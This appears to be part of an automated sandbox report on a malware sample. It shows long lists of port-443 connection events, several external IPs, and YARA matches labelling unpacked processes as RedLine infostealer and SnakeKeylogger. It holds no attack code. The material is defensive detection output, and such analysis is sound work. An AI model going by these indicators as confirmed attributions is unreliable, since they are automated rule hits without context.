            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 16.182.70.225:443 -> 192.168.2.7:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49972 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 14.2.yihfsboC.pif.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 21.2.Cobsfhiy.PIF.20805c08.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.1.yihfsboC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.1.yihfsboC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.EPTMAcgvNZ.exe.21ef13d8.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
